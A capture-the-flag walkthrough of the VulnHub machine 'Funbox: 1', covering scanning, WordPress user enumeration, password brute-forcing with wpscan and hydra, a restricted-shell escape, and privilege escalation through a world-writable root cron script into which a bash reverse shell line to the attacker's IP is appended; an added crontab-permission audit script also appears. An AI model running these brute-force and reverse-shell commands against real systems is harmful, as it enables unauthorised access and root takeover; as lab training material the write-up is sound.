
Funbox 1 walkthrough

Hello hackers. Today we are talking about another VulnHub machine, “Funbox: 1”, made by twitter@0815R2d2. It’s presented as a Boot2Root that you should be able to solve in 20 minutes. I’m not really sure about the time, but let’s try it out.

https://www.vulnhub.com/entry/funbox-1,518/

To be honest, I could not root this machine in 20 minutes. I had spent about 1.5 hours before I reached the goal. It involved enumeration, brute-forcing, bypassing bash restrictions and a reverse shell. Let’s begin our pentest.

Ok, we downloaded and installed Funbox. Then, using netdiscover, we found its IP address:

sudo netdiscover

Our victim is 192.168.1.102. First, we should scan the machine. Some penetration testers use Zenmap because it has a GUI, but I prefer speed over a good-looking suit.

nmap -sS -sC -sV -p- 192.168.1.102

As we can see, Funbox has 4 open ports: ports 21 and 22 for FTP and SSH respectively, port 80 for the web server and port 33060 for MySQL. I suggest starting with HTTP.

If you look at the Nmap output more closely you will see several interesting things: 1. a disallowed directory, /secret/; and 2. a redirect to http://funbox.fritz.box/

The next thing we have to do is edit /etc/hosts and add our new host there:

sudo nano /etc/hosts

After all of those preparations we are ready to open Firefox and start browsing.

http://funbox.fritz.box/

What do we have here? WordPress 5.4.2 on Apache 2.4.41. These versions are quite new to be vulnerable.

Let’s check the “secret” directory which we found earlier…

http://funbox.fritz.box/secret/

Ahhah, “Try harder” 😉 A reference to the OSCP course! Ok. But what’s next?

Let’s look closer at the WordPress installation and try to enumerate it. I usually do three things: enumerate vulnerable plugins, enumerate vulnerable themes and enumerate users.

Unfortunately, there were no vulnerable themes or plugins. But we were able to find 2 users in the CMS: admin and Joe.

wpscan --url http://funbox.fritz.box/ -e u

We have the usernames and now we have to find their passwords. Let’s try to brute-force them. It’s a CTF, so the right password should be either on the web page or in the rockyou.txt file. The first option doesn’t work (I tried it using cewl), so we will use rockyou.txt.

wpscan --url http://funbox.fritz.box/ --passwords /root/Desktop/rockyou.txt --usernames joe

Wow, that’s incredible. We’ve found the password for joe: 12345. Ok, good one. Let’s try the same method for admin.

wpscan --url http://funbox.fritz.box/ --passwords /root/Desktop/rockyou.txt --usernames admin

Is it for real? 🙂 So simple? Ok. Now we could log in to WordPress as admin, change some source code and get a reverse shell as www-data. But do we really need www-data access? As you may remember, FTP and SSH are open, so let’s try to get access over those protocols. For this purpose we create a file containing our logins and passwords.

hydra -C users.txt ssh://192.168.1.102
hydra -C users.txt ftp://192.168.1.102

Interesting. Before we connect via SSH, let’s check what kind of information is on the FTP.

ftp 192.168.1.102

…and let’s read the mbox:

cat mbox

As we can see, there are 2 emails. One of them is useless, but the first one is a hint: a backup script. We will keep it in mind.

Now let’s connect by SSH:

ssh joe@192.168.1.102; password: 12345

And we are in. Let’s look around.

id; uname -a; sudo -l; pwd; ls

Let’s go further.

cd ..; export | grep -i "shell"

Ok, tricky move, sysadmin, tricky move 😉 Let’s see whether you prohibited us from launching another shell.

bash

Easy-peasy, lemon squeezy 🙂

Ok, where were we? I almost forgot about the bash history. Let’s check it.

cat /home/joe/.bash_history

I think we’ve found the backup script. According to the history, Joe can modify the file. Let’s check it.

ls -l /home/funny/.backup.sh

Interesting. The owner of the file is funny, and it is executed as funny, but anyone can modify it…

ls -al /home/funny; cat .reminder.sh

Interesting note. It looks like .backup.sh is run from cron. Let’s use pspy64 to check our theory. I downloaded pspy64 and put it into /tmp. Now it’s time to launch it.

bash /tmp/pspy64

As you can see, /home/funny/.backup.sh is running under UID=1000 (funny) and UID=0 (root). So let’s modify the file and wait for the incoming connection 🙂
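The root cause here is a script that root’s cron executes but that any user can modify. The following audit is an added defender-side example (not part of the original walkthrough) that walks an /etc/crontab-style file and reports every job whose script is group- or world-writable, or owned by someone other than root or the job’s own user; on Funbox it would flag /home/funny/.backup.sh. It assumes Linux with GNU or BusyBox stat, and all paths in the comments are demo values.

```shell
# Added defender-side audit, not from the original walkthrough: find cron
# jobs whose script can be modified by someone other than the account the
# job runs as. On Funbox the root cron job ran /home/funny/.backup.sh, a
# world-writable file owned by "funny"; this check would report it.
# Assumes Linux with GNU/BusyBox stat; all paths below are demo values.

# check_cron_script FILE RUNAS
# Exit 0 and print a finding if FILE is group/world-writable or owned by a
# user other than root or RUNAS; exit 1 if it looks safe; exit 2 if missing.
check_cron_script() {
    file="$1"; runas="${2:-root}"
    if [ ! -e "$file" ]; then echo "MISSING  $file"; return 2; fi
    perm=$(stat -c '%a' "$file")      # octal digits, e.g. 666
    owner=$(stat -c '%U' "$file")     # e.g. funny
    group_w=$(( perm / 10 % 10 / 2 % 2 ))   # write bit of the group digit
    other_w=$(( perm % 10 / 2 % 2 ))        # write bit of the others digit
    finding=""
    if [ "$other_w" -eq 1 ]; then finding="world-writable"; fi
    if [ "$group_w" -eq 1 ]; then finding="${finding:+$finding,}group-writable"; fi
    if [ "$owner" != root ] && [ "$owner" != "$runas" ]; then
        finding="${finding:+$finding,}owned-by-$owner-but-run-as-$runas"
    fi
    if [ -z "$finding" ]; then return 1; fi
    echo "FINDING  $file (mode $perm, owner $owner): $finding"
    return 0
}

# audit_crontab FILE
# Walk an /etc/crontab-style file (five schedule fields, a user field, then
# the command) and check the first word of every command that is an
# absolute path. Prints the number of findings; details go to stderr.
audit_crontab() {
    cronfile="$1"; count=0
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in ''|'#'*|*=*) continue ;; esac   # comments, env lines
        fields=$(printf '%s\n' "$line" | awk 'NF >= 7 {print $6, $7}')
        [ -n "$fields" ] || continue     # @reboot-style lines are not parsed
        runas=${fields%% *}; script=${fields#* }
        case "$script" in /*) ;; *) continue ;; esac
        if check_cron_script "$script" "$runas" >&2; then count=$((count + 1)); fi
    done < "$cronfile"
    echo "$count"
}

# Usage: audit_crontab /etc/crontab
```

Only the system crontab format with a user field is parsed; per-user crontabs (crontab -l) have no user field and would need the owning user passed as RUNAS directly.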

First, let’s start listening…

nc -nlvp 2020

and add one little line.

bash -i >& /dev/tcp/192.168.1.137/2020 0>&1

Now it’s time to have a rest and just wait…

nc -nlvp 2020

The first 2 callbacks succeeded but only gave us the user. The last one, however, came in as root. We did it.

To conclude, it is a good intermediate machine where you can improve your pentesting skills.

See you soon.